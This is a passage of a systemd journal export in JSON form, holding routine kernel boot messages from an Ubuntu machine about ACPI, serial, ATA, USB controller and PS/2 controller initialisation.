"SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "863357", "MESSAGE" : "input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=159;b=e2b08827b5804427b422c10c84f1567e;m=56a89e;t=5bd16dd1a2806;x=faabb4a05e54fe68", "__REALTIME_TIMESTAMP" : "1615280779962374", "__MONOTONIC_TIMESTAMP" : "5679262", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "867345", "MESSAGE" : "ACPI: Power Button [PWRF]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15a;b=e2b08827b5804427b422c10c84f1567e;m=56a8a9;t=5bd16dd1a2810;x=b5d2cab658903538", "__REALTIME_TIMESTAMP" : "1615280779962384", "__MONOTONIC_TIMESTAMP" : "5679273", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "895765", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 10" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15b;b=e2b08827b5804427b422c10c84f1567e;m=56a8b3;t=5bd16dd1a281b;x=975e38e9f7891a99", "__REALTIME_TIMESTAMP" : "1615280779962395", "__MONOTONIC_TIMESTAMP" : "5679283", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "953887", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKA] enabled at IRQ 10" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15c;b=e2b08827b5804427b422c10c84f1567e;m=56a8be;t=5bd16dd1a2825;x=76d0dfb4403d0404", "__REALTIME_TIMESTAMP" : "1615280779962405", "__MONOTONIC_TIMESTAMP" : "5679294", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "959258", "MESSAGE" : "Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15d;b=e2b08827b5804427b422c10c84f1567e;m=56a8c8;t=5bd16dd1a2830;x=e3dc566651669442", "__REALTIME_TIMESTAMP" : "1615280779962416", "__MONOTONIC_TIMESTAMP" : "5679304", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "990516", "MESSAGE" : "00:04: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15e;b=e2b08827b5804427b422c10c84f1567e;m=56a8d3;t=5bd16dd1a283a;x=bafe6839371d59b1", "__REALTIME_TIMESTAMP" : "1615280779962426", "__MONOTONIC_TIMESTAMP" : "5679315", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "995867", "MESSAGE" : "Linux agpgart interface v0.103" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15f;b=e2b08827b5804427b422c10c84f1567e;m=56a8e1;t=5bd16dd1a2848;x=e1e7dbc7437c01cd", "__REALTIME_TIMESTAMP" : "1615280779962440", "__MONOTONIC_TIMESTAMP" : "5679329", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "999305", "MESSAGE" : "loop: module loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=160;b=e2b08827b5804427b422c10c84f1567e;m=56a981;t=5bd16dd1a28e8;x=5ea5d18ed95c93f8", "__REALTIME_TIMESTAMP" : "1615280779962600", "__MONOTONIC_TIMESTAMP" : "5679489", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1001245", "MESSAGE" : "ata_piix 0000:00:01.1: version 2.13" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=161;b=e2b08827b5804427b422c10c84f1567e;m=56aa3a;t=5bd16dd1a29a2;x=75e5a5ceaf738cb5", "__REALTIME_TIMESTAMP" : "1615280779962786", "__MONOTONIC_TIMESTAMP" : "5679674", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "scsi", "_KERNEL_DEVICE" : "+scsi:host0", "_UDEV_SYSNAME" : "host0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1002292", "MESSAGE" : "scsi host0: ata_piix" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=162;b=e2b08827b5804427b422c10c84f1567e;m=56aaca;t=5bd16dd1a2a31;x=8576405b03731e66", "__REALTIME_TIMESTAMP" : "1615280779962929", "__MONOTONIC_TIMESTAMP" : "5679818", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "scsi", "_KERNEL_DEVICE" : "+scsi:host1", "_UDEV_SYSNAME" : "host1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1004238", "MESSAGE" : "scsi host1: ata_piix" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=163;b=e2b08827b5804427b422c10c84f1567e;m=56aad9;t=5bd16dd1a2a41;x=138bf646975bf51", "__REALTIME_TIMESTAMP" : "1615280779962945", "__MONOTONIC_TIMESTAMP" : "5679833", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1006029", "MESSAGE" : "ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc0c0 irq 14" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=164;b=e2b08827b5804427b422c10c84f1567e;m=56aae4;t=5bd16dd1a2a4b;x=2194139371723e17", "__REALTIME_TIMESTAMP" : "1615280779962955", "__MONOTONIC_TIMESTAMP" : "5679844", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1009318", "MESSAGE" : "ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc0c8 irq 15" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=165;b=e2b08827b5804427b422c10c84f1567e;m=56aafe;t=5bd16dd1a2a65;x=4dc37be8fab0aeaf", "__REALTIME_TIMESTAMP" : "1615280779962981", "__MONOTONIC_TIMESTAMP" : "5679870", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1013436", "MESSAGE" : "libphy: Fixed MDIO Bus: probed" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=166;b=e2b08827b5804427b422c10c84f1567e;m=56ab19;t=5bd16dd1a2a80;x=2cf67f06d0b6d664", "__REALTIME_TIMESTAMP" : "1615280779963008", "__MONOTONIC_TIMESTAMP" : "5679897", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1015489", "MESSAGE" : "tun: Universal TUN/TAP device driver, 1.6" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=167;b=e2b08827b5804427b422c10c84f1567e;m=56ab23;t=5bd16dd1a2a8b;x=378816d957ac1cbf", "__REALTIME_TIMESTAMP" : "1615280779963019", "__MONOTONIC_TIMESTAMP" : "5679907", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1018110", "MESSAGE" : "PPP generic driver version 2.4.2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=168;b=e2b08827b5804427b422c10c84f1567e;m=56ab2e;t=5bd16dd1a2a95;x=18e4f82f2fb204f5", "__REALTIME_TIMESTAMP" : "1615280779963029", "__MONOTONIC_TIMESTAMP" : "5679918", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1020262", "MESSAGE" : "ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=169;b=e2b08827b5804427b422c10c84f1567e;m=56ab38;t=5bd16dd1a2aa0;x=3e3190bec7f42fb6", "__REALTIME_TIMESTAMP" : "1615280779963040", "__MONOTONIC_TIMESTAMP" : "5679928", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1023545", "MESSAGE" : "ehci-pci: EHCI PCI platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16a;b=e2b08827b5804427b422c10c84f1567e;m=56ab43;t=5bd16dd1a2aaa;x=1ef9ebda111f1d22", "__REALTIME_TIMESTAMP" : "1615280779963050", "__MONOTONIC_TIMESTAMP" : "5679939", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1025829", "MESSAGE" : "ehci-platform: EHCI generic platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16b;b=e2b08827b5804427b422c10c84f1567e;m=56ab51;t=5bd16dd1a2ab8;x=3dfe6dbf3b16578f", "__REALTIME_TIMESTAMP" : "1615280779963064", "__MONOTONIC_TIMESTAMP" : "5679953", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1028441", "MESSAGE" : "ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16c;b=e2b08827b5804427b422c10c84f1567e;m=56ab5b;t=5bd16dd1a2ac3;x=5c45b4e56c4e32d3", "__REALTIME_TIMESTAMP" : "1615280779963075", "__MONOTONIC_TIMESTAMP" : "5679963", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1031526", "MESSAGE" : "ohci-pci: OHCI PCI platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16d;b=e2b08827b5804427b422c10c84f1567e;m=56ab66;t=5bd16dd1a2acd;x=c6af84ea0edcf2a4", "__REALTIME_TIMESTAMP" : "1615280779963085", "__MONOTONIC_TIMESTAMP" : "5679974", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1033861", "MESSAGE" : "ohci-platform: OHCI generic platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16e;b=e2b08827b5804427b422c10c84f1567e;m=56ab71;t=5bd16dd1a2ad8;x=27122ae32a945e34", "__REALTIME_TIMESTAMP" : "1615280779963096", "__MONOTONIC_TIMESTAMP" : "5679985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1036472", "MESSAGE" : "uhci_hcd: USB Universal Host Controller Interface driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16f;b=e2b08827b5804427b422c10c84f1567e;m=56ac12;t=5bd16dd1a2b79;x=6e5c6dcfc49b8307", "__REALTIME_TIMESTAMP" : "1615280779963257", "__MONOTONIC_TIMESTAMP" : "5680146", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1065982", "MESSAGE" : "uhci_hcd 0000:00:01.2: UHCI Host Controller" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=170;b=e2b08827b5804427b422c10c84f1567e;m=56aca9;t=5bd16dd1a2c11;x=6cc042b6b48f343f", "__REALTIME_TIMESTAMP" : "1615280779963409", "__MONOTONIC_TIMESTAMP" : "5680297", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1068810", "MESSAGE" : "uhci_hcd 0000:00:01.2: new USB bus registered, assigned bus number 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=171;b=e2b08827b5804427b422c10c84f1567e;m=56ad2b;t=5bd16dd1a2c93;x=4773aee5aabdab80", "__REALTIME_TIMESTAMP" : "1615280779963539", "__MONOTONIC_TIMESTAMP" : "5680427", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1072774", "MESSAGE" : "uhci_hcd 0000:00:01.2: detected 2 ports" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=172;b=e2b08827b5804427b422c10c84f1567e;m=56d595;t=5bd16dd1a54fc;x=251c545145a04c84", "__REALTIME_TIMESTAMP" : "1615280779973884", "__MONOTONIC_TIMESTAMP" : "5690773", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1075535", "MESSAGE" : "uhci_hcd 0000:00:01.2: irq 11, io base 0x0000c080" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=173;b=e2b08827b5804427b422c10c84f1567e;m=56d6aa;t=5bd16dd1a5612;x=9be4e9f717037fc4", "__REALTIME_TIMESTAMP" : "1615280779974162", "__MONOTONIC_TIMESTAMP" : "5691050", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1078685", "MESSAGE" : "usb usb1: New USB device found, idVendor=1d6b, idProduct=0001" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=174;b=e2b08827b5804427b422c10c84f1567e;m=56d753;t=5bd16dd1a56ba;x=edb68a51b32d1f48", "__REALTIME_TIMESTAMP" : "1615280779974330", "__MONOTONIC_TIMESTAMP" : "5691219", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1082159", "MESSAGE" : "usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=175;b=e2b08827b5804427b422c10c84f1567e;m=56d7f3;t=5bd16dd1a575a;x=4551231a8f22525c", "__REALTIME_TIMESTAMP" : "1615280779974490", "__MONOTONIC_TIMESTAMP" : "5691379", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1085960", "MESSAGE" : "usb usb1: Product: UHCI Host Controller" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=176;b=e2b08827b5804427b422c10c84f1567e;m=571306;t=5bd16dd1a926d;x=87ece26f0c49ecc4", "__REALTIME_TIMESTAMP" : "1615280779989613", "__MONOTONIC_TIMESTAMP" : "5706502", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1088517", "MESSAGE" : "usb usb1: Manufacturer: Linux 4.15.0-60-generic uhci_hcd" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=177;b=e2b08827b5804427b422c10c84f1567e;m=571413;t=5bd16dd1a937b;x=322d5212720146ca", "__REALTIME_TIMESTAMP" : "1615280779989883", "__MONOTONIC_TIMESTAMP" : "5706771", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1091807", "MESSAGE" : "usb usb1: SerialNumber: 0000:00:01.2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=178;b=e2b08827b5804427b422c10c84f1567e;m=572760;t=5bd16dd1aa6c7;x=e9bd32cc57333af6", "__REALTIME_TIMESTAMP" : "1615280779994823", "__MONOTONIC_TIMESTAMP" : "5711712", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "+usb:1-0:1.0", "_UDEV_SYSNAME" : "1-0:1.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1094287", "MESSAGE" : "hub 1-0:1.0: USB hub found" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=179;b=e2b08827b5804427b422c10c84f1567e;m=572807;t=5bd16dd1aa76e;x=1424ea86ec6e89e1", "__REALTIME_TIMESTAMP" : "1615280779994990", "__MONOTONIC_TIMESTAMP" : "5711879", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "+usb:1-0:1.0", "_UDEV_SYSNAME" : "1-0:1.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1096296", "MESSAGE" : "hub 1-0:1.0: 2 ports detected" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17a;b=e2b08827b5804427b422c10c84f1567e;m=572818;t=5bd16dd1aa77f;x=487a777dc803ce69", "__REALTIME_TIMESTAMP" : "1615280779995007", "__MONOTONIC_TIMESTAMP" : "5711896", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1098684", "MESSAGE" : "i8042: PNP: PS/2 Controller [PNP0303:KBD,PNP0f13:MOU] at 0x60,0x64 irq 1,12" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17b;b=e2b08827b5804427b422c10c84f1567e;m=572824;t=5bd16dd1aa78b;x=c885aa5c0b1f5851", "__REALTIME_TIMESTAMP" : "1615280779995019", "__MONOTONIC_TIMESTAMP" : "5711908", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1103996", "MESSAGE" : "serio: i8042 KBD port at 0x60,0x64 irq 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17c;b=e2b08827b5804427b422c10c84f1567e;m=57282f;t=5bd16dd1aa796;x=1ac2ff77ced2737", "__REALTIME_TIMESTAMP" : "1615280779995030", "__MONOTONIC_TIMESTAMP" : "5711919", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1106696", "MESSAGE" : "serio: i8042 AUX port at 0x60,0x64 irq 12" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17d;b=e2b08827b5804427b422c10c84f1567e;m=572839;t=5bd16dd1aa7a1;x=1843acc11db0ccff", "__REALTIME_TIMESTAMP" : "1615280779995041", "__MONOTONIC_TIMESTAMP" : "5711929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", 